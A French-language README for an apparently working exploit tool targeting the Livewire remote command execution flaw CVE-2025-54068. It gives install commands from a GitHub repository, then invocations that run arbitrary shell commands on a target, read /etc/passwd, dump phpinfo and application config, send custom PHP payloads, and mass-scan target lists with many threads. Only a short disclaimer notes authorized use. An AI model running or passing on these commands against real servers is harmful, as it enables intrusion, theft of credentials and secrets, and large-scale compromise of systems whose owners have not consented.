
Un outil conçu pour exploiter CVE-2025-54068 et l'exécution de commandes à distance du projet Livewire.
Un outil conçu pour exploiter CVE-2025-54068 et l'exécution de commandes à distance si la APP_KEY du projet Livewire est connue.
Cet outil est une version réécrite du projet original de Synacktiv :
Le concept central et la méthodologie sont basés sur l'implémentation originale. Cette version inclut des améliorations mineures et des fonctionnalités supplémentaires pour améliorer la convivialité et la flexibilité.
Installez l'outil avec pipx :
pipx install git+https://github.com/haxorstars/CVE-2025-54068
ou avec uv :
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
Exécutez l'outil contre une seule cible :
livewire-rce-2025 -u target.com
Avec des paramètres personnalisés :
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
Exécutez des fonctions personnalisées prédéfinies :
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
Combinez plusieurs fonctions dans une seule commande :
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
Utilisez votre propre fichier de payload PHP :
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
Générez le payload sans l'envoyer à la cible :
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
Ou en utilisant un fichier PHP personnalisé :
livewire-rce-2025 -generate-payload --custom-file custom.php
Scannez plusieurs cibles à partir d'un fichier :
livewire-rce-2025 -mass-check targets.txt -o results.json
Avec un nombre de threads personnalisé :
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
Bon hacking 😄